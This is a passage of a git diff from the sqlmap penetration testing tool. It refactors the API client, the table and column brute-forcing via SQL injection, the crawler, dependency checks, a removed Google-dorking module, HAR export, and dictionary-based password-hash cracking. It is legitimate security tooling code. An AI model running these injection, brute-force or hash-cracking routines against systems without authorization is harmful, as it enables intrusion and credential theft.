res["success"]: + logger.error("Failed to start scan") + continue + logger.info("Scanning started") + + elif command.startswith("use"): + taskid = (command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command in ("list", "flush"): + raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None + dataToStdout("%s\n" % raw) + + elif command in ("exit", "bye", "quit", 'q'): + return + + elif command in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "option OPTION Retrieve and show option for current task\n" + msg += "options Retrieve and show all options for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" + msg += "flush Flush tasks (delete all tasks)\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) diff --git a/lib/techniques/brute/use.py b/lib/utils/brute.py similarity index 87% rename from lib/techniques/brute/use.py rename to lib/utils/brute.py index 4a1594590..2c41f4211 100644 --- a/lib/techniques/brute/use.py +++ b/lib/utils/brute.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -28,9 +28,9 @@ from lib.core.enums import HASHDB_KEYS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import METADB_SUFFIX from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request import inject @@ -57,8 +57,7 @@ def tableExists(tableFile, regex=None): logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " - test = readInput(message, default="N") - kb.tableExistsChoice = test[0] in ("y", "Y") + kb.tableExistsChoice = readInput(message, default='N', boolean=True) if not kb.tableExistsChoice: return None @@ -70,15 +69,23 @@ def tableExists(tableFile, regex=None): if result: errMsg = "can't use table existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) - tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) + message = "which common tables (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % tableFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common tables file location?\n" + tableFile = readInput(message) or tableFile infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) + tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) @@ -102,7 +109,7 @@ def tableExists(tableFile, regex=None): break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) + fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table @@ -114,7 +121,7 @@ def tableExists(tableFile, regex=None): threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) - if conf.verbose in (1, 2) and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) @@ -161,8 +168,7 @@ def columnExists(columnFile, regex=None): logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " - test = readInput(message, default="N") - kb.columnExistsChoice = test[0] in ("y", "Y") + kb.columnExistsChoice = readInput(message, default='N', boolean=True) if not kb.columnExistsChoice: return None @@ -178,10 +184,19 @@ def columnExists(columnFile, regex=None): if result: errMsg = "can't use column existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) + message = "which common columns (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % columnFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common columns file location?\n" + columnFile = readInput(message) or columnFile + infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) @@ -222,7 +237,7 @@ def columnExists(columnFile, regex=None): if result: threadData.shared.value.append(column) - if conf.verbose in (1, 2) and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index be47608e1..27fc8fbdb 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -12,16 +12,21 @@ import urlparse import tempfile import time +from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import findPageForms +from lib.core.common import getSafeExString from lib.core.common import openFile from lib.core.common import readInput from lib.core.common import safeCSValue +from lib.core.common import urldecode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads @@ -58,12 +63,15 @@ def crawl(target): try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, e: - errMsg = "connection exception detected (%s). skipping " % e + except SqlmapConnectionException, ex: + errMsg = "connection exception detected (%s). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) - except httplib.InvalidURL, e: - errMsg = "invalid URL detected (%s). skipping " % e + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except httplib.InvalidURL, ex: + errMsg = "invalid URL detected (%s). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) @@ -80,7 +88,7 @@ def crawl(target): tags = soup('a') if not tags: - tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content) + tags = re.finditer(r'(?i)<a[^>]+href="(?P<href>[^>"]+)"', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") @@ -91,7 +99,7 @@ def crawl(target): url = urlparse.urljoin(current, href) # flag to know if we are dealing with the same target host - _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) + _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): @@ -104,6 +112,8 @@ def crawl(target): threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) + except ValueError: # for non-valid links + pass except UnicodeEncodeError: # for non-HTML files pass finally: @@ -121,22 +131,28 @@ def crawl(target): if not conf.sitemapUrl: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " - test = readInput(message, default="n") - if test[0] in ("y", "Y"): + + if readInput(message, default='N', boolean=True): + found = True items = None url = urlparse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) + except SqlmapConnectionException, ex: + if "page not found" in getSafeExString(ex): + found = False + logger.warn("'sitemap.xml' not found") except: pass finally: - if items: - for item in items: - if re.search(r"(.*?)\?(.+)", item): - threadData.shared.value.add(item) - if conf.crawlDepth > 1: - threadData.shared.unprocessed.update(items) - logger.info("%s links found" % ("no" if not items else len(items))) + if found: + if items: + for item in items: + if re.search(r"(.*?)\?(.+)", item): + threadData.shared.value.add(item) + if conf.crawlDepth > 1: + threadData.shared.unprocessed.update(items) + logger.info("%s links found" % ("no" if not items else len(items))) infoMsg = "starting crawler" if conf.bulkFile: @@ -172,7 +188,7 @@ def crawl(target): logger.warn(warnMsg) else: for url in threadData.shared.value: - kb.targets.add((url, None, None, None, None)) + kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) storeResultsToFile(kb.targets) @@ -183,11 +199,11 @@ def storeResultsToFile(results): if kb.storeCrawlingChoice is None: message = "do you want to store crawling results to a temporary file " message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeCrawlingChoice = test[0] in ("y", "Y") + + kb.storeCrawlingChoice = readInput(message, default='N', boolean=True) if kb.storeCrawlingChoice: - handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt") + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt") os.close(handle) infoMsg = "writing crawling results to a temporary file '%s' " % filename diff --git a/lib/utils/deps.py b/lib/utils/deps.py index efca6e1c3..391dd0f63 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -19,35 +19,37 @@ def checkDependencies(): try: if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql - import pymssql + __import__("_mssql") + import pymssql if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " warnMsg += "Download from %s" % data[2] logger.warn(warnMsg) elif dbmsName == DBMS.MYSQL: - import pymysql + __import__("pymysql") elif dbmsName == DBMS.PGSQL: - import psycopg2 + __import__("psycopg2") elif dbmsName == DBMS.ORACLE: - import cx_Oracle + __import__("cx_Oracle") elif dbmsName == DBMS.SQLITE: - import sqlite3 + __import__("sqlite3") elif dbmsName == DBMS.ACCESS: - import pyodbc + __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb + __import__("kinterbasdb") elif dbmsName == DBMS.DB2: - import ibm_db_dbi + __import__("ibm_db_dbi") elif dbmsName == DBMS.HSQLDB: - import jaydebeapi - import jpype + __import__("jaydebeapi") + __import__("jpype") + elif dbmsName == DBMS.INFORMIX: + __import__("ibm_db_dbi") except ImportError: warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg += "in order to directly connect to the DBMS " - warnMsg += "%s. Download from %s" % (dbmsName, data[2]) + warnMsg += "'%s'. Download from %s" % (dbmsName, data[2]) logger.warn(warnMsg) missing_libraries.add(data[1]) @@ -57,7 +59,7 @@ def checkDependencies(): logger.debug(debugMsg) try: - import impacket + __import__("impacket") debugMsg = "'python-impacket' third-party library is found" logger.debug(debugMsg) except ImportError: @@ -68,7 +70,7 @@ def checkDependencies(): missing_libraries.add('python-impacket') try: - import ntlm + __import__("ntlm") debugMsg = "'python-ntlm' third-party library is found" logger.debug(debugMsg) except ImportError: @@ -79,7 +81,7 @@ def checkDependencies(): missing_libraries.add('python-ntlm') try: - from websocket import ABNF + __import__("websocket.ABNF") debugMsg = "'python websocket-client' library is found" logger.debug(debugMsg) except ImportError: @@ -91,7 +93,7 @@ def checkDependencies(): if IS_WIN: try: - import pyreadline + __import__("pyreadline") debugMsg = "'python-pyreadline' third-party library is found" logger.debug(debugMsg) except ImportError: diff --git a/lib/utils/getch.py b/lib/utils/getch.py index af9a56160..cbb67616e 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/google.py b/lib/utils/google.py deleted file mode 100644 index b12de7ced..000000000 --- a/lib/utils/google.py +++ /dev/null @@ -1,161 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import httplib -import re -import socket -import urllib -import urllib2 - -from lib.core.common import getUnicode -from lib.core.common import readInput -from lib.core.common import urlencode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.settings import GOOGLE_REGEX -from lib.core.settings import DUCKDUCKGO_REGEX -from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import UNICODE_ENCODING -from lib.request.basic import decodePage -from lib.request.httpshandler import HTTPSHandler - -class Google(object): - """ - This class defines methods used to perform Google dorking (command - line option '-g <google dork>' - """ - - def __init__(self, handlers): - self._cj = cookielib.CookieJar() - - handlers.append(urllib2.HTTPCookieProcessor(self._cj)) - handlers.append(HTTPSHandler()) - - self.opener = urllib2.build_opener(*handlers) - self.opener.addheaders = conf.httpHeaders - - try: - conn = self.opener.open("http://www.google.com/ncr") - conn.info() # retrieve session cookie - except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % ex - raise SqlmapConnectionException(errMsg) - - def search(self, dork): - """ - This method performs the effective search on Google providing - the google dork and the Google session cookie - """ - - gpage = conf.googlePage if conf.googlePage > 1 else 1 - logger.info("using Google result page #%d" % gpage) - - if not dork: - return None - - url = "http://www.google.com/search?" - url += "q=%s&" % urlencode(dork, convall=True) - url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" - url += "&start=%d" % ((gpage - 1) * 100) - - try: - conn = self.opener.open(url) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except (urllib2.URLError, socket.error, socket.timeout): - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)] - - if not retVal and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "used IP address disabling further searches" - raise SqlmapGenericException(warnMsg) - - if not retVal: - message = "no usable links found. " - message += "do you want to (re)try with DuckDuckGo? [Y/n] " - output = readInput(message, default="Y") - - if output.strip().lower() != 'n': - url = "https://duckduckgo.com/d.js?" - url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) - - if not conf.randomAgent: - self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.USER_AGENT.lower()] - self.opener.addheaders.append((HTTP_HEADER.USER_AGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0")) - - self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.ACCEPT_ENCODING.lower()] - self.opener.addheaders.append((HTTP_HEADER.ACCEPT_ENCODING, HTTP_ACCEPT_ENCODING_HEADER_VALUE)) - - try: - conn = self.opener.open(url) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except: - errMsg = "unable to connect to DuckDuckGo" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(DUCKDUCKGO_REGEX, page, re.I | re.S)] - - return retVal diff --git a/lib/utils/har.py b/lib/utils/har.py new file mode 100644 index 000000000..5630ec4d2 --- /dev/null +++ b/lib/utils/har.py @@ -0,0 +1,194 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import base64 +import BaseHTTPServer +import httplib +import re +import StringIO + +from lib.core.data import logger +from lib.core.settings import VERSION + +class HTTPCollectorFactory: + def __init__(self, harFile=False): + self.harFile = harFile + + def create(self): + collector = HTTPCollector() + + return collector + +class HTTPCollector: + def __init__(self): + self.messages = [] + + def collectRequest(self, requestMessage, responseMessage): + self.messages.append(RawPair(requestMessage, responseMessage)) + + def obtain(self): + return {"log": { + "version": "1.2", + "creator": {"name": "sqlmap", "version": VERSION}, + "entries": [pair.toEntry().toDict() for pair in self.messages], + }} + +class RawPair: + def __init__(self, request, response): + self.request = request + self.response = response + + def toEntry(self): + return Entry(request=Request.parse(self.request), + response=Response.parse(self.response)) + +class Entry: + def __init__(self, request, response): + self.request = request + self.response = response + + def toDict(self): + return { + "request": self.request.toDict(), + "response": self.response.toDict(), + } + +class Request: + def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None): + self.method = method + self.path = path + self.httpVersion = httpVersion + self.headers = headers or {} + self.postBody = postBody + self.comment = comment + self.raw = raw + + @classmethod + def parse(cls, raw): + request = HTTPRequest(raw) + return cls(method=request.command, + path=request.path, + httpVersion=request.request_version, + headers=request.headers, + postBody=request.rfile.read(), + comment=request.comment, + raw=raw) + + @property + def url(self): + host = self.headers.get("Host", "unknown") + return "http://%s%s" % (host, self.path) + + def toDict(self): + out = { + "httpVersion": self.httpVersion, + "method": self.method, + "url": self.url, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()], + "comment": self.comment, + } + + if self.postBody: + contentType = self.headers.get("Content-Type") + out["postData"] = { + "mimeType": contentType, + "text": self.postBody.rstrip("\r\n"), + } + + return out + +class Response: + extract_status = re.compile(r'\((\d{3}) (.*)\)') + + def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None): + self.raw = raw + self.httpVersion = httpVersion + self.status = status + self.statusText = statusText + self.headers = headers + self.content = content + self.comment = comment + + @classmethod + def parse(cls, raw): + altered = raw + comment = None + + if altered.startswith("HTTP response ["): + io = StringIO.StringIO(raw) + first_line = io.readline() + parts = cls.extract_status.search(first_line) + status_line = "HTTP/1.0 %s %s" % (parts.group(1), parts.group(2)) + remain = io.read() + altered = status_line + "\n" + remain + comment = first_line + + response = httplib.HTTPResponse(FakeSocket(altered)) + response.begin() + + try: + content = response.read(-1) + except httplib.IncompleteRead: + content = raw[raw.find("\n\n") + 2:].rstrip("\r\n") + + return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0", + status=response.status, + statusText=response.reason, + headers=response.msg, + content=content, + comment=comment, + raw=raw) + + def toDict(self): + content = { + "mimeType": self.headers.get("Content-Type"), + "text": self.content, + } + + binary = set(['\0', '\1']) + if any(c in binary for c in self.content): + content["encoding"] = "base64" + content["text"] = base64.b64encode(self.content) + + return { + "httpVersion": self.httpVersion, + "status": self.status, + "statusText": self.statusText, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"], + "content": content, + "comment": self.comment, + } + +class FakeSocket: + # Original source: + # https://stackoverflow.com/questions/24728088/python-parse-http-response-string + + def __init__(self, response_text): + self._file = StringIO.StringIO(response_text) + + def makefile(self, *args, **kwargs): + return self._file + +class HTTPRequest(BaseHTTPServer.BaseHTTPRequestHandler): + # Original source: + # https://stackoverflow.com/questions/4685217/parse-raw-http-headers + + def __init__(self, request_text): + self.comment = None + self.rfile = StringIO.StringIO(request_text) + self.raw_requestline = self.rfile.readline() + + if self.raw_requestline.startswith("HTTP request ["): + self.comment = self.raw_requestline + self.raw_requestline = self.rfile.readline() + + self.error_code = self.error_message = None + self.parse_request() + + def send_error(self, code, message): + self.error_code = code + self.error_message = message diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 69994d23e..039adb68e 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -30,6 +30,7 @@ import os import re import tempfile import time +import zipfile from hashlib import md5 from hashlib import sha1 @@ -44,6 +45,7 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite @@ -60,6 +62,8 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import HASH +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_USER_COLUMNS @@ -123,6 +127,13 @@ def postgres_passwd(password, username, uppercase=False): 'md599e5ea7a6f7c3269995cba3927fd0093' """ + + if isinstance(username, unicode): + username = unicode.encode(username, UNICODE_ENCODING) + + if isinstance(password, unicode): + password = unicode.encode(password, UNICODE_ENCODING) + retVal = "md5%s" % md5(password + username).hexdigest() return retVal.upper() if uppercase else retVal.lower() @@ -207,7 +218,10 @@ def oracle_old_passwd(password, username, uppercase=True): # prior to version ' IV, pad = "\0" * 8, "\0" if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) # pyDes has issues with unicode strings + username = unicode.encode(username, UNICODE_ENCODING) + + if isinstance(password, unicode): + password = unicode.encode(password, UNICODE_ENCODING) unistr = "".join("\0%s" % c for c in (username + password).upper()) @@ -327,8 +341,11 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False): return output + if isinstance(password, unicode): + password = password.encode(UNICODE_ENCODING) + cipher = md5(salt) - cipher.update(password.encode(UNICODE_ENCODING)) + cipher.update(password) hash_ = cipher.digest() for i in xrange(count): @@ -365,13 +382,13 @@ def storeHashesToFile(attack_dict): if kb.storeHashesChoice is None: message = "do you want to store hashes to a temporary file " message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeHashesChoice = test[0] in ("y", "Y") + + kb.storeHashesChoice = readInput(message, default='N', boolean=True) if not kb.storeHashesChoice: return - handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt") + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt") os.close(handle) infoMsg = "writing hashes to a temporary file '%s' " % filename @@ -465,11 +482,11 @@ def attackDumpedTable(): storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") - test = readInput(message, default="N" if conf.multipleTargets else "Y") + choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) @@ -488,7 +505,7 @@ def attackDumpedTable(): value = table[column]['values'][i] if value and value.lower() in lut: - table[column]['values'][i] += " (%s)" % lut[value.lower()] + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()])) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) def hashRecognition(value): @@ -512,7 +529,7 @@ def hashRecognition(value): return retVal -def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): +def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api): if IS_WIN: coloramainit() @@ -566,7 +583,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - if not hasattr(conf, "api"): + if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: @@ -588,7 +605,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc with proc_count.get_lock(): proc_count.value -= 1 -def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): +def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): if IS_WIN: coloramainit() @@ -640,7 +657,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found if user and not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user - if not hasattr(conf, "api"): + if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: @@ -668,8 +685,9 @@ def dictionaryAttack(attack_dict): hash_regexes = [] results = [] resumes = [] - processException = False user_hash = [] + processException = False + foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: @@ -693,6 +711,7 @@ def dictionaryAttack(attack_dict): if not hash_: continue + foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): @@ -705,14 +724,18 @@ def dictionaryAttack(attack_dict): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE): + elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC): + elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS): - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + elif hash_regex in (HASH.WORDPRESS,): + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + else: + warnMsg = "invalid hash '%s'" % hash_ + logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) @@ -743,20 +766,20 @@ def dictionaryAttack(attack_dict): message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" - choice = readInput(message, default="1") + choice = readInput(message, default='1') try: - if choice == "2": + if choice == '2': message = "what's the custom dictionary's location?\n" - dictPaths = [readInput(message)] - - logger.info("using custom dictionary") - elif choice == "3": + _ = readInput(message) + if _: + dictPaths = [readInput(message)] + logger.info("using custom dictionary") + elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) - logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") @@ -766,17 +789,24 @@ def dictionaryAttack(attack_dict): for dictPath in dictPaths: checkFile(dictPath) + if os.path.splitext(dictPath)[1].lower() == ".zip": + _ = zipfile.ZipFile(dictPath, 'r') + if len(_.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % dictPath + raise SqlmapDataException(errMsg) + else: + _.open(_.namelist()[0]) + kb.wordlists = dictPaths except Exception, ex: warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % ex.message + warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " - test = readInput(message, default="N") - if test[0] in ("y", "Y"): + if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % 